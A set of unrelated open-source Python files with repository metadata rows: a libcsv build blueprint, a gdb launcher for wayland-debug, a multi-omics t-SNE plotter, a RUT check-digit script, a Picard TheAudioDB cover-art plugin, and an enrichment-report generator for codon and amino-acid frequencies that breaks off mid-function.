    # Builds libcsv with the stock autotools flow.
    def __init__(self, **args):
        AutoToolsPackageBase.__init__(self)
        # No extra configure arguments are needed for libcsv.
        self.subinfo.options.configure.args = ""
        # The release tarball already ships a generated configure script.
        self.subinfo.options.configure.autoreconf = False
| sklnet/craft-blueprints-tellico | libs/libcsv/libcsv.py | libcsv.py | py | 656 | python | en | code | 0 | github-code | 90 |
35286946391 | import subprocess
import os
from typing import List
from core.util import check_gdb
from frontends.tui import Arguments
def verify_has_debug_symbols(lib: str) -> None:
    """Raise RuntimeError if *lib* does not appear to contain debug symbols."""
    resolved = os.path.realpath(lib)
    # `file` prints "with debug_info" for ELF binaries carrying DWARF data.
    file_info = subprocess.run(
        ['file', resolved], check=True, capture_output=True, encoding='utf-8')
    if 'with debug_info' in file_info.stdout:
        return
    raise RuntimeError(
        lib + ' does not appear to have debug symbols. ' +
        'See https://github.com/wmww/wayland-debug/blob/master/libwayland_debug_symbols.md ' +
        'for more information')
def verify_gdb_available() -> None:
    """Raise RuntimeError when no gdb executable can be located on PATH."""
    if subprocess.run(['which', 'gdb'], capture_output=True).returncode != 0:
        raise RuntimeError('gdb not found, install gdb to use gdb mode')
def run_gdb(args: Arguments, quiet: bool) -> int:
    '''
    Runs GDB, and runs a child instance of this script inside it as a plugin

    args: parsed command-line arguments; args.wayland_debug_args[0] must be
        the path of the currently running script, and args.command_args are
        forwarded to gdb itself
    quiet: when False, the spawned gdb command line is echoed to stdout
    Returns GDB's exit status, or -1 for other error
    '''
    # debugging infinitely nested debuggers isn't fun
    assert not check_gdb(), 'Tried to run GDB from inside GDB'
    verify_gdb_available()
    # Imports will be broken on the new instance, so we need to fix the python import path for the child process
    env = os.environ.copy()
    python_path_var = 'PYTHONPATH'
    prev = ''
    if python_path_var in env:
        prev = ':' + env[python_path_var]
    # Add the directory the running file is located in to the path
    env[python_path_var] = os.path.dirname(os.path.realpath(args.wayland_debug_args[0])) + prev
    # Get libwayland libs and make sure they have debug symbols
    if args.wayland_lib_dir is not None:
        for lib in ['client', 'server']:
            lib_path = os.path.join(args.wayland_lib_dir, 'libwayland-' + lib + '.so')
            if os.path.exists(lib_path):
                verify_has_debug_symbols(lib_path)
    # Add libwayland libs to the LD_LIBRARY_PATH (filter() drops empty components)
    env['LD_LIBRARY_PATH'] = ':'.join(filter(None, [args.wayland_lib_dir, env.get('LD_LIBRARY_PATH', '')]))
    # All the args before the GDB option need to be sent along to the child instance
    # Since we run the child instance from the GDB command, we need to pack them all in there
    my_args_str = ', '.join('"' + i.replace('"', '\\"') + '"' for i in args.wayland_debug_args)
    # Yes, this is exactly what it looks like. It's is python code, inside python code which runs python code
    call_str = 'python import sys; sys.argv = [' + my_args_str + ']; exec(open("' + args.wayland_debug_args[0] + '").read())'
    call_args = ['gdb', '-ex', call_str] + args.command_args
    if not quiet:
        print('Running subprocess: ' + repr(call_args))
    sp = subprocess.Popen(call_args, env=env)
    # Keep waiting across Ctrl+C: the terminal delivers SIGINT to gdb too,
    # which handles it itself, so we just resume waiting for it to exit.
    while True:
        try:
            sp.wait()
            return sp.returncode
        except KeyboardInterrupt:
            pass
    # NOTE(review): unreachable -- the loop above can only exit via return.
    return -1
| wmww/wayland-debug | backends/gdb_plugin/runner.py | runner.py | py | 2,879 | python | en | code | 56 | github-code | 90 |
31686020847 | import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import os
import glob
import torch
from sklearn.manifold import TSNE
from biopy.datasets import DatasetMultiOmicsGDCTrainTest, DatasetMultiOmicsNatureA549, DatasetMultiOmicsNatureTrainTest
from biopy.utils import sample_encodings
from biopy.models import FC_VAE, NucleiImgVAE
def get_dataset(dataset_name, dataset_folder):
    """Load and preprocess the requested dataset.

    Returns a (dataset, omic names, (legend labels, color palette)) triple.
    """
    def gdc():
        dataset = DatasetMultiOmicsGDCTrainTest(folder=dataset_folder)
        dataset.set_omic('mRNA')
        dataset.log1p(all_omics=False)
        dataset.standardize(all_omics=True)
        dataset.feature_selection_by('mad', all_omics=True, top_n=2000)
        labels = ['', '', '', '', 'normal', 'tumor']
        colors = ['#0d47a1', '#b71c1c', '#2196f3', '#f44336', '#90caf9', '#ef9a9a']
        return dataset, ['mRNA', 'miRNA', 'meth27-450-preprocessed'], (labels, colors)

    def cd4():
        dataset = DatasetMultiOmicsNatureTrainTest(folder=dataset_folder)
        labels = ['', '', 'poised', 'quiesc.']
        colors = ['#E98616', '#8616E9', '#A86214', '#4d0f85']
        return dataset, ['nuclei-images', 'rna'], (labels, colors)

    def a549():
        dataset = DatasetMultiOmicsNatureA549(folder=dataset_folder)
        dataset.log1p(all_omics=True)
        dataset.standardize(all_omics=True)
        labels = ['', '', '', '0 hours', '1 hours', '3 hours']
        colors = ['#E98616', '#16E986', '#8616E9', '#A86214', '#14A862', '#4d0f85']
        return dataset, ['rna', 'atac'], (labels, colors)

    # Add here your additional datasets and/or preprocessings
    loaders = {'gdc': gdc, 'cd4': cd4, 'a549': a549}
    return loaders[dataset_name]()
def get_models(ds, omics, model_name):
    """Build the (untrained) per-omic models for the requested architecture."""
    def gdc_vae():
        models = {}
        for omic in omics:
            data_size = ds.set_omic(omic)[0][0].shape[0]
            models[omic] = FC_VAE(data_size=data_size, hidden_size=80,
                                  n_hidden=data_size, last_hidden=100)
        return models

    def cd4_vae():
        return {
            'nuclei-images': NucleiImgVAE(data_size=1, hidden_size=128),
            'rna': FC_VAE(data_size=7633, hidden_size=128, n_hidden=1024),
        }

    def a549_vae():
        return {
            'atac': FC_VAE(data_size=815, n_hidden=815, hidden_size=50, last_hidden=100),
            'rna': FC_VAE(data_size=2613, n_hidden=2613, hidden_size=50, last_hidden=100),
        }

    # Add here your additional models
    builders = {'gdc_vae': gdc_vae, 'cd4_vae': cd4_vae, 'a549_vae': a549_vae}
    return builders[model_name]()
def get_latent_encodings(model, dataset, tsne=True, dim=2):
    """Encode each dataset with its model and stack the latent codes.

    model: list of trained encoder models, one per omic
    dataset: list of datasets, aligned with *model*
    tsne: when True, project the stacked encodings to *dim* dimensions
    Returns (encodings, colors): colors assigns each sample an integer label
    offset by i * nlab per omic, so omics never share a color index.
    """
    assert len(model) == len(dataset)
    encodings = []
    for i, mod in enumerate(model):
        encodings.append(sample_encodings(mod, dataset[i], tsne=False))
    encodings_py = np.concatenate(encodings)
    if tsne:
        encodings_py = TSNE(n_components=dim).fit_transform(encodings_py)
    lab = []
    for i, data in enumerate(dataset):
        # assumes each dataset item is a (sample, label) pair -- TODO confirm
        if hasattr(data, 'no_slicing'):
            # 'no_slicing' marks datasets that must be iterated item by item
            nlab = len(set(list(map(lambda x: x[1].numpy().item(), data))))
            lab.append(np.array(list(map(lambda x: x[1] + (i * nlab), data))))
        else:
            nlab = len(set(data[0][:][1].numpy()))
            lab.append(np.array([int(item[1]) + (i * nlab) for item in data]))
    colors = np.concatenate(lab)
    return encodings_py, colors
def main(dataset_name, dataset_folder, model_name, checkpoints, output_path):
    """Plot a t-SNE map of the latent codes of every omic and save it.

    checkpoints: path template containing an '{omic}' placeholder for the
        per-omic model weights
    output_path: destination of the scatter plot; the legend is written
        separately to '<output_path>.legend.png'
    """
    ds, omics, (legend_labels, palette) = get_dataset(dataset_name, dataset_folder)
    models = get_models(ds, omics, model_name)
    datasets = []
    for omic in omics:
        model = models[omic]
        # map_location='cpu' lets the plot run on machines without a GPU.
        model.load_state_dict(torch.load(checkpoints.format(omic=omic), map_location=torch.device('cpu')))
        model.eval()
        d = ds.set_omic(omic)
        # presumably forces item-by-item iteration in get_latent_encodings -- verify
        d.no_slicing = 'YES'
        datasets.append(d)
    encodings_py, colors = get_latent_encodings(model=[models[omic] for omic in omics], dataset=datasets)
    fig, ax = plt.subplots(figsize=(6, 5))
    sc = ax.scatter(encodings_py[:, 0], encodings_py[:, 1], c=colors, s=4,
                    cmap=mpl.colors.ListedColormap(palette))
    ax.set_axis_off()
    ax.set_xlim([-75, 75])
    fig.savefig(output_path, dpi=300, bbox_inches='tight')
    # Save the legend on a separate file
    fig, ax = plt.subplots(figsize=(1, 1))
    legend = ax.legend(sc.legend_elements()[0], legend_labels, loc='upper left',
                       title=" OMIC LABEL ", ncol=len(omics), columnspacing=-1)
    # A fully transparent frame so only the legend entries are visible.
    legend.get_frame().set_alpha(None)
    legend.get_frame().set_facecolor((0, 0, 0, 0))
    ax.set_axis_off()
    ax.set_xlim([-75, 75])
    fig.savefig(f"{output_path}.legend.png", dpi=300, bbox_inches='tight')
| BioPyTeam/biopy | scripts/visualizer.py | visualizer.py | py | 4,782 | python | en | code | 0 | github-code | 90 |
29182171534 |
def check_digit(rut: str) -> str:
    """Return the Chilean RUT check digit for *rut* (digits only).

    Standard modulo-11 algorithm: weight the digits 2,3,4,5,6,7 (cycling)
    from right to left; the digit is 11 - (total % 11), rendered as '0'
    when that is 11 and as 'K' when it is 10.
    """
    total = sum(((i % 6) + 2) * int(digit)
                for i, digit in enumerate(reversed(rut)))
    remainder = 11 - (total % 11)
    if remainder == 11:
        return '0'
    if remainder == 10:
        return 'K'
    return str(remainder)


if __name__ == '__main__':
    rol = input("Ingrese tu rut: ")
    # The original printed (total % 11) - 11, i.e. the negated check digit;
    # print the real verification digit instead.
    print(rol, check_digit(rol))
| Lucero1867/ejercicios.php | DigitoVerificador.py | DigitoVerificador.py | py | 206 | python | en | code | 0 | github-code | 90 |
14296599237 | PLUGIN_NAME = 'TheAudioDB cover art'
PLUGIN_AUTHOR = 'Philipp Wolfer'
PLUGIN_DESCRIPTION = 'Use cover art from TheAudioDB.'
PLUGIN_VERSION = "1.3.1"
PLUGIN_API_VERSIONS = ["2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6"]
PLUGIN_LICENSE = "GPL-2.0-or-later"
PLUGIN_LICENSE_URL = "https://www.gnu.org/licenses/gpl-2.0.html"
from base64 import b64decode
from PyQt5.QtCore import QUrl
from PyQt5.QtNetwork import QNetworkReply
from picard import config, log
from picard.coverart.providers import (
CoverArtProvider,
ProviderOptions,
register_cover_art_provider,
)
from picard.coverart.image import CoverArtImage
from picard.config import (
BoolOption,
TextOption,
)
from picard.webservice import ratecontrol
from .ui_options_theaudiodb import Ui_TheAudioDbOptionsPage
THEAUDIODB_HOST = "www.theaudiodb.com"
THEAUDIODB_PORT = 443
# The API key ships base64-obfuscated; it is decoded when the provider is created.
THEAUDIODB_APIKEY = 'MWQ2NTY1NjQ2OTRmMTM0ZDY1NjU2NA=='
# Possible values of the "theaudiodb_use_cdart" setting.
OPTION_CDART_ALWAYS = "always"
OPTION_CDART_NEVER = "never"
OPTION_CDART_NOALBUMART = "noalbumart"
# No rate limit for TheAudioDB.
ratecontrol.set_minimum_delay((THEAUDIODB_HOST, THEAUDIODB_PORT), 0)
class TheAudioDbOptionsPage(ProviderOptions):
    """Settings page for the TheAudioDB cover art provider."""

    _options_ui = Ui_TheAudioDbOptionsPage

    options = [
        TextOption("setting", "theaudiodb_use_cdart", OPTION_CDART_NOALBUMART),
        BoolOption("setting", "theaudiodb_use_high_quality", False),
    ]

    def _cdart_radio_buttons(self):
        # Maps each stored option value to its radio button, in the order
        # the original if/elif chain checked them.
        return (
            (OPTION_CDART_ALWAYS, self.ui.theaudiodb_cdart_use_always),
            (OPTION_CDART_NEVER, self.ui.theaudiodb_cdart_use_never),
            (OPTION_CDART_NOALBUMART, self.ui.theaudiodb_cdart_use_if_no_albumcover),
        )

    def load(self):
        current = config.setting["theaudiodb_use_cdart"]
        for value, button in self._cdart_radio_buttons():
            if value == current:
                button.setChecked(True)
                break
        self.ui.theaudiodb_use_high_quality.setChecked(
            config.setting['theaudiodb_use_high_quality'])

    def save(self):
        for value, button in self._cdart_radio_buttons():
            if button.isChecked():
                config.setting["theaudiodb_use_cdart"] = value
                break
        config.setting['theaudiodb_use_high_quality'] = self.ui.theaudiodb_use_high_quality.isChecked()
class TheAudioDbCoverArtImage(CoverArtImage):
    """Image from The Audio DB"""

    # This provider attaches image types (front / medium) to each image.
    support_types = True
    # Prefix shown as the image source in Picard's cover art UI.
    sourceprefix = "AUDIODB"

    def parse_url(self, url):
        super().parse_url(url)
        # Workaround for Picard always returning port 80 regardless of the
        # scheme. No longer necessary for Picard >= 2.1.3
        self.port = self.url.port(443 if self.url.scheme() == 'https' else 80)
class CoverArtProviderTheAudioDb(CoverArtProvider):
    """Use TheAudioDB to get cover art"""

    NAME = "TheAudioDB"
    TITLE = "TheAudioDB"
    OPTIONS = TheAudioDbOptionsPage

    def __init__(self, coverart):
        super().__init__(coverart)
        # The API key ships base64-obfuscated; decode it once per instance.
        self.__api_key = b64decode(THEAUDIODB_APIKEY).decode()

    def enabled(self):
        # Only query TheAudioDB while no front image has been found yet.
        return super().enabled() and not self.coverart.front_image_found

    def queue_images(self):
        """Request album metadata for the release group; reply handled async."""
        release_group_id = self.metadata["musicbrainz_releasegroupid"]
        path = "/api/v1/json/%s/album-mb.php" % self.__api_key
        queryargs = {
            "i": bytes(QUrl.toPercentEncoding(release_group_id)).decode()
        }
        log.debug("TheAudioDB: Queued download: %s?i=%s", path, queryargs["i"])
        self.album.tagger.webservice.get(
            THEAUDIODB_HOST,
            THEAUDIODB_PORT,
            path,
            self._json_downloaded,
            priority=True,
            important=False,
            parse_response_type='json',
            queryargs=queryargs)
        self.album._requests += 1
        return CoverArtProvider.WAIT

    def _json_downloaded(self, data, reply, error):
        """Handle the API reply and queue the configured cover art images."""
        self.album._requests -= 1
        if error:
            # A missing release group (404) is expected and only worth a
            # debug message; anything else is a real error.
            if error != QNetworkReply.ContentNotFoundError:
                error_level = log.error
            else:
                error_level = log.debug
            error_level("TheAudioDB: Problem requesting metadata: %s", error)
            # NOTE(review): next_in_queue() is not called on this path --
            # verify whether cover art processing should still advance here.
        else:
            try:
                # Guard against an empty body: `data` may be None, and the
                # original `data.get(...)` raised an uncaught AttributeError.
                releases = data.get("album") if data else None
                if not releases:
                    log.debug("TheAudioDB: No cover art found for %s",
                              reply.url().url())
                    return
                release = releases[0]
                albumart_url = None
                if config.setting['theaudiodb_use_high_quality']:
                    albumart_url = release.get("strAlbumThumbHQ")
                if not albumart_url:
                    # Fall back to the standard-quality thumbnail.
                    albumart_url = release.get("strAlbumThumb")
                cdart_url = release.get("strAlbumCDart")
                use_cdart = config.setting["theaudiodb_use_cdart"]
                if albumart_url:
                    self._select_and_add_cover_art(albumart_url, ["front"])
                if cdart_url and (use_cdart == OPTION_CDART_ALWAYS
                                  or (use_cdart == OPTION_CDART_NOALBUMART
                                      and not albumart_url)):
                    # With no album cover, the CD art doubles as the front image.
                    types = ["medium"]
                    if not albumart_url:
                        types.append("front")
                    self._select_and_add_cover_art(cdart_url, types)
            except (AttributeError, TypeError, IndexError):
                # A malformed payload must not crash the tagger's callback.
                log.error("TheAudioDB: Problem processing downloaded metadata", exc_info=True)
            finally:
                self.next_in_queue()

    def _select_and_add_cover_art(self, url, types):
        log.debug("TheAudioDB: Found artwork %s" % url)
        self.queue_put(TheAudioDbCoverArtImage(url, types=types))
register_cover_art_provider(CoverArtProviderTheAudioDb)
| metabrainz/picard-plugins | plugins/theaudiodb/__init__.py | __init__.py | py | 5,963 | python | en | code | 130 | github-code | 90 |
23902075531 | import xlrd
from connect_db import connect_db

# Open the workbook and the sheet that holds the rows to import.
book = xlrd.open_workbook("C:/имя файла")
sheet = book.sheet_by_name("pos книга в файле")
database = connect_db()
cursor = database.cursor()
query = """INSERT INTO имя таблицы (имя колонки) VALUES (%s, %s)"""
# Row 0 is the header, so start at row 1.  executemany() sends all rows in
# a single call instead of one execute() round trip per row.
rows = [(sheet.cell(r, 0).value, sheet.cell(r, 1).value)
        for r in range(1, sheet.nrows)]
cursor.executemany(query, rows)
cursor.close()
database.commit()
database.close() | besapuz/excel_bd | excel_in_SQL.py | excel_in_SQL.py | py | 524 | python | ru | code | 0 | github-code | 90 |
10921442712 | ##############################################################################
# Description #
##############################################################################
# This script allows the creation of the query_summary.xlsx file and the
# creation of the enrichment report.xlsx file
##############################################################################
# File #
##############################################################################
import xlsxwriter
from dictionnary import *
from rpy2.robjects.packages import importr
from rpy2.robjects.vectors import FloatVector
import numpy as np
group_nature2complete_name = { "NP": "Non polar", "NP-Alkyl": "Non polar alkyl",
"NP-aromatic": "Non polar and aromatic", "NPR": "Non polar restrained", "P": "Polar",
"PN": "Polar neutral", "PNC": "Polar uncharged", "PNC1": "Polar uncharged 1",
"PNC2" : "Polar uncharged 2", "PC": "Polar charged", "P-NC": "Polar negatively charged",
"P-PC": "Polar positively charged", "HC": "Hydrophobic chain", "H": "Hydrophobic",
"Aliphatic": "Aliphatic", "HS": "hydroxylated/sulfured", "Aromatic": "Aromatic"
}
##############################################################################
# Functions #
##############################################################################
# --------------------------- query_summary.xlsx -----------------------------
def size_adaptater(content):
    """
    :param content: (list of list of string) the content of a sheet
    :return: (list of int) per-column width: the length of the longest cell
    (as a string) in each column, used to size the columns of every sheet in
    query_results.xlsx
    """
    num_cols = max((len(row) for row in content), default=0)
    widths = [0] * num_cols
    for row in content:
        for col, cell in enumerate(row):
            widths[col] = max(widths[col], len(str(cell)))
    return widths
def sheet_filler(content, a_sheet, header_format, normal_format):
    """Write *content* into *a_sheet* row by row, then widen each column.

    The first row, and every row whose first cell contains 'Name : ', is
    rendered with *header_format*; all other rows use *normal_format*.
    """
    for row_index, row in enumerate(content):
        is_header = row_index == 0 or 'Name : ' in row[0]
        a_sheet.write_row(row_index, 0, row,
                          header_format if is_header else normal_format)
    # Widen every column to its longest cell plus a small margin.
    for col_index, width in enumerate(size_adaptater(content)):
        a_sheet.set_column(col_index, col_index, width + 2)
def writing_query_results_file(outpath, input_content, exon_list):
    """
    Create the query_results.xlsx workbook with its four sheets.

    :param outpath: (string) directory where query_results.xlsx is created
    :param input_content: (list of list of string) the content of the input sheet
    :param exon_list: (instance of ListExon) a list of exons providing the
    content of the mapping, sequence and feature sheets
    """
    workbook = xlsxwriter.Workbook(outpath + "query_results.xlsx")
    # shared cell formats
    header_format = workbook.add_format(
        {'bg_color': '#00DCFF', 'align': 'center', 'valign': 'vcenter', 'border': True})
    normal_format = workbook.add_format(
        {'align': 'center', 'valign': 'vcenter', 'border': True})
    # (sheet name, sheet content) pairs, in workbook tab order
    sheets = [("input", input_content),
              ("mapping", exon_list.get_content_mapping_sheet()),
              ("sequence", exon_list.get_content_sequence_sheet()),
              ("feature", exon_list.get_content_feature_sheet())]
    for sheet_name, sheet_content in sheets:
        worksheet = workbook.add_worksheet(sheet_name)
        sheet_filler(sheet_content, worksheet, header_format, normal_format)
    workbook.close()
# --------------------------- enrichment report.xlsx -----------------------------
def check_regulation(user_frequency, ic_90, p_value, p_value_corrected):
    """
    Derive regulation symbols from a frequency and its significance tests.

    :param user_frequency: (float) a frequency of a codon/amino acid/nature from the exon set given by the user
    :param ic_90: (list of 2 floats) an interval containing 90% of the frequency of the codon/amino acid/nature of
    interest
    :param p_value: (float) a p_value indicating if the frequency of the codon/amino acid/nature of interest is
    different from the frequency of the same codon/amino acid/nature in the control set
    :param p_value_corrected: (float) the corrected p_value (fdr method)
    :return: (2 strings) one regulation symbol for the raw p-value and one for
    the corrected p-value: " = " when not significant (p > 0.05), otherwise
    "-" when the user frequency lies below the lower bound of ic_90 and "+"
    otherwise
    """
    def symbol(p):
        # significant only when p <= 0.05; the direction is decided by the
        # position of the user frequency w.r.t. the lower IC90 bound
        if p > 0.05:
            return " = "
        return "-" if user_frequency < ic_90[0] else "+"
    return symbol(p_value), symbol(p_value_corrected)
def calculate_ic_90(control_frequencies):
    """
    :param control_frequencies: frequencies of the control sets
    :return: dict mapping each codon/amino acid/nature to [low, high], the
    interval containing 90% of its control frequencies (the values at the
    5th and 95th percentile positions). NOTE: each frequency list is sorted
    in place as a side effect.
    """
    ic_90 = dict()
    for key, freqs in control_frequencies.items():
        freqs.sort()
        n = len(freqs)
        ic_90[key] = [freqs[int(n * 0.05)], freqs[int(n * 0.95)]]
    return ic_90
def get_content_codon_enrichment(control_frequencies, interest_frequencies, interest_frequencies_5p, interest_frequencies_3p, dic_p_val, set_number):
    """
    Build the content of the "codon" sheet of enrichment_report.xlsx.

    :param control_frequencies: (dictionary of float) a dictionary containing the codon frequencies of the control sets
    :param interest_frequencies: (dictionary of float) a dictionary frequency of each codon in the user set of exons
    :param interest_frequencies_5p: (dictionary of float) codon frequencies in the 5' part of the user exon set
    :param interest_frequencies_3p: (dictionary of float) codon frequencies in the 3' part of the user exon set
    :param dic_p_val: (dic of floats) a dictionary containing the p_values
    :param set_number: (int) the number of set to create
    :return: (list of list of strings, dict) the content of the codon sheet
    (one row per codon) and the BH-corrected p-value of each codon
    """
    # the 64 codons, in the fixed display order of the sheet
    codon_list = ["TAG" , "TAA" , "TGA", "GCA" , "GCC" , "GCG" , "GCT" , "TGT" , "TGC" , "GAT" , "GAC" , "GAA" ,
                  "GAG" , "TTC" , "TTT" , "GGT" , "GGG" , "GGA" , "GGC" , "CAT" , "CAC" , "ATC" , "ATA" , "ATT" ,
                  "AAG" , "AAA" , "CTG" , "CTA" , "CTC" , "CTT" , "TTG" , "TTA" , "ATG" , "AAC" , "AAT" , "CCT" ,
                  "CCG" , "CCA" , "CCC" , "CAA" , "CAG" , "AGG" , "AGA" , "CGA" , "CGC" , "CGG" , "CGT" , "AGC" ,
                  "AGT" , "TCG" , "TCC" , "TCA" , "TCT" , "ACC" , "ACA" , "ACG" , "ACT" , "GTA" , "GTC" , "GTG" ,
                  "GTT" , "TGG" , "TAT" , "TAC"]
    dic_padjust = {}
    content = [["codon", "tRNA", "amino_acid", "frequencies_of_the_interest_set", "frequencies_interest_set_5p", "frequencies_interest_set_3p",
                "average_frequencies_of_the_"+str(set_number)+"_sets", "IC_90_of_the_"+str(set_number)+"_sets",
                "p_values_like", "FDR", "regulation_(p<=0.05)", "regulation(fdr<=0.05)", "codon_info"]]
    ic_90 = calculate_ic_90(control_frequencies)
    p_vals = list()
    for codon in codon_list:
        p_vals.append(dic_p_val[codon])
    # Benjamini-Hochberg correction computed through R's stats::p.adjust (rpy2)
    rstats = importr('stats')
    p_adjust = rstats.p_adjust(FloatVector(p_vals), method="BH")
    i = 0
    for codon in codon_list:
        # codon2rare/codon2anticodon/codon2aminoAcid are module-level lookup
        # tables — presumably defined earlier in this file (not visible here);
        # TODO confirm
        if codon2rare[codon] == "+":
            info_codon = "Frequent"
        elif codon2rare[codon] == "-":
            info_codon = "Rare"
        else:
            info_codon = ""
        regulation, regulation_fdr = check_regulation(interest_frequencies[codon], ic_90[codon], dic_p_val[codon],
                                                      p_adjust[i])
        content.append([str(codon), str(codon2anticodon[codon]), str(codon2aminoAcid[codon]),
                        str(interest_frequencies[codon]), str(interest_frequencies_5p[codon]), str(interest_frequencies_3p[codon]), str(np.mean(control_frequencies[codon])),
                        str(ic_90[codon]), str(dic_p_val[codon]), str(p_adjust[i]), str(regulation),
                        str(regulation_fdr), str(info_codon)])
        dic_padjust[codon] = p_adjust[i]
        i += 1
    return content, dic_padjust
def get_content_amino_acid_enrichment(control_frequencies, interest_frequencies, interest_frequencies_5p, interest_frequencies_3p, dic_p_val, set_number):
    """
    Build the content of the "amino_acid" sheet of enrichment_report.xlsx.

    :param control_frequencies: (dictionary of floats) a dictionary containing the amino acid frequencies of the control
    sets
    :param interest_frequencies: (dictionary of floats) a dictionary frequency of each amino acid in the user set of
    exons
    :param interest_frequencies_5p: (dictionary of floats) amino acid frequencies in the 5' part of the user set
    :param interest_frequencies_3p: (dictionary of floats) amino acid frequencies in the 3' part of the user set
    :param dic_p_val: (dictionary of floats) a dictionary containing the p_values
    :param set_number: (int) the number of set to create
    :return: (list of list of strings, dict) the content of the amino_acid sheet (each sublist is a row of the
    amino_acid sheet of enrichment_report.xlsx) and the BH-corrected p-value of each amino acid
    """
    dic_padjust = {}
    content = [["amino_acid", "frequencies_of_the_interest_set", "frequencies_interest_set_5p", "frequencies_interest_set_3p",
                "average_frequencies_of_the_"+str(set_number)+"_sets",
                "IC_90_of_the_"+str(set_number)+"_sets", "p_values_like", "FDR", "regulation_(p<=0.05)",
                "regulation(fdr<=0.05)"]]
    ic_90 = calculate_ic_90(control_frequencies)
    p_vals = list()
    # amino acids are processed in sorted order so the p-value vector and the
    # row loop below stay aligned
    for amino_acid in sorted(dic_p_val.keys()):
        p_vals.append(dic_p_val[amino_acid])
    # Benjamini-Hochberg correction through R's stats::p.adjust (rpy2)
    rstats = importr('stats')
    p_adjust = rstats.p_adjust(FloatVector(p_vals), method="BH")
    i = 0
    for amino_acid in sorted(dic_p_val.keys()):
        regulation, regulation_fdr = check_regulation(interest_frequencies[amino_acid], ic_90[amino_acid],
                                                      dic_p_val[amino_acid], p_adjust[i])
        content.append([str(amino_acid), str(interest_frequencies[amino_acid]), str(interest_frequencies_5p[amino_acid]), str(interest_frequencies_3p[amino_acid]),
                        str(np.mean(control_frequencies[amino_acid])), str(ic_90[amino_acid]),
                        str(dic_p_val[amino_acid]), str(p_adjust[i]), str(regulation), str(regulation_fdr)])
        dic_padjust[amino_acid] = p_adjust[i]
        i += 1
    return content, dic_padjust
def get_content_group_enrichment(control_frequencies, interest_frequencies, interest_frequencies_5p, interest_frequencies_3p, dic_p_val, set_number, name, list_key=None):
    """
    Build the content of a generic group sheet of enrichment_report.xlsx.

    :param control_frequencies: (dictionary of floats) a dictionary containing the amino acid nature frequencies of the
    control sets
    :param interest_frequencies: (dictionary of floats) a dictionary frequency of each amino acid nature in the user set
    of exons
    :param interest_frequencies_5p: (dictionary of floats) group frequencies in the 5' part of the user set
    :param interest_frequencies_3p: (dictionary of floats) group frequencies in the 3' part of the user set
    :param dic_p_val: (dictionary of floats) a dictionary containing the p_values
    :param set_number: (int) the number of set to create
    :param name: (string) the name of the first column
    :param list_key: (list of string) display order of the keys; entries equal
    to " " produce blank separator rows
    :return: (list of list of strings, dict) the sheet content and the
    BH-corrected p-value of each key. Bug fix: this dict used to be returned
    empty, unlike in the sibling get_content_*_enrichment functions.
    """
    content = [[name, "frequencies_of_the_interest_set", "frequencies_interest_set_5p", "frequencies_interest_set_3p",
                "average_frequencies_of_the_"+str(set_number)+"_sets", "IC_90_of_the_"+str(set_number)+"_sets",
                "p_values_like", "FDR", "regulation_(p<=0.05)", "regulation(fdr<=0.05)"]]
    ic_90 = calculate_ic_90(control_frequencies)
    p_vals = [dic_p_val[nature] for nature in dic_p_val.keys()]
    # Benjamini-Hochberg correction through R's stats::p.adjust (rpy2)
    rstats = importr('stats')
    p_adjust = list(rstats.p_adjust(FloatVector(p_vals), method="BH"))
    # map each key to its corrected p-value (dict iteration order is stable,
    # so this matches the order of p_vals above)
    dic_padjust = dict(zip(dic_p_val.keys(), p_adjust))

    def row_for(nature):
        # one sheet row per key, mirroring the header columns above
        regulation, regulation_fdr = check_regulation(interest_frequencies[nature], ic_90[nature],
                                                      dic_p_val[nature], dic_padjust[nature])
        return [str(nature), str(interest_frequencies[nature]), str(interest_frequencies_5p[nature]), str(interest_frequencies_3p[nature]),
                str(np.mean(control_frequencies[nature])), str(ic_90[nature]), str(dic_p_val[nature]),
                str(dic_padjust[nature]), str(regulation), str(regulation_fdr)]

    if list_key is None:
        for nature in dic_p_val.keys():
            content.append(row_for(nature))
    else:
        for nature in list_key:
            if nature == " ":
                # blank separator row (kept at 7 cells, as before)
                content.append([" " for i in range(7)])
            else:
                content.append(row_for(nature))
    return content, dic_padjust
def create_iupac_dic(dic):
    """
    Derive values for the ambiguous two-base IUPAC nucleotide codes.

    :param dic: (dictionary of float) must have the following keys : A, T, G, C
    :return: dict mapping each ambiguous IUPAC code (Y, R, W, S, K, M) to the
    sum of the values of the two bases it stands for
    """
    base_pairs = {"Y": ("C", "T"), "R": ("A", "G"), "W": ("T", "A"),
                  "S": ("C", "G"), "K": ("T", "G"), "M": ("A", "C")}
    return {code: dic[first] + dic[second]
            for code, (first, second) in base_pairs.items()}
def sorted_string(a_dic, nt_string=None):
    """
    Render dictionary entries as a string, sorted by decreasing value.

    :param a_dic: (dictionary of float) - the key of the dictionary are nucleotides and their associated value their
    frequencies in a sequence of interest
    :param nt_string: (string) sequence of nucleotides that corresponds to frequencies in "a_dic" dictionary
    :return: a "K(v) - K(v) - ..." string of the entries ordered by decreasing
    value; when nt_string is given, also returns a second string where each
    value is expressed as a percentage of len(nt_string), rounded to 1 decimal
    """
    ordered = sorted(a_dic.items(), key=lambda item: item[1], reverse=True)
    counts = " - ".join("%s(%s)" % (key, value) for key, value in ordered)
    if nt_string is None:
        return counts
    proportions = " - ".join(
        "%s(%s)" % (key, round(float(value * 100) / len(nt_string), 1))
        for key, value in ordered)
    return counts, proportions
def get_group_nt_info(list_aa):
    """
    :param list_aa: (list of string) list of amino acid
    :return: the number of nt in all the codon coded by all the amino acid in the list, their proportion and their
    pondered proportion
    example : list_aa = K, W
    codon list = AAA, AAG, TGG:
    count_str = A(5) - G(3) - T(1) - C(0) - Y(1) - R(8) - S(3) - W(6) - K(4) - M(5) -D....
    count_prop = A(55.6) - G(33.3) - ....
    count_pond = A((5./6 + 0./3) * 100 /2 = 41.6) - G(41.6)
    """
    res = {"A":0, "T":0, "G":0, "C":0}          # raw nt counts over all codons
    ponderate = {"A":0., "T":0., "G":0., "C":0.}  # per-amino-acid weighted proportions
    curstr = ""
    for aa in list_aa:
        # amino_acid2codon is a module-level table mapping an amino acid to a
        # comma-separated list of its codons — presumably defined earlier in
        # this file (not visible here); TODO confirm
        cur_codon = amino_acid2codon[aa].replace(",","")
        for nt in ponderate.keys():
            # each amino acid contributes its own nt proportion, so amino
            # acids with few codons weigh as much as those with many
            ponderate[nt] += float(cur_codon.count(nt)) / len(cur_codon)
        curstr += cur_codon
    for nt in ponderate.keys():
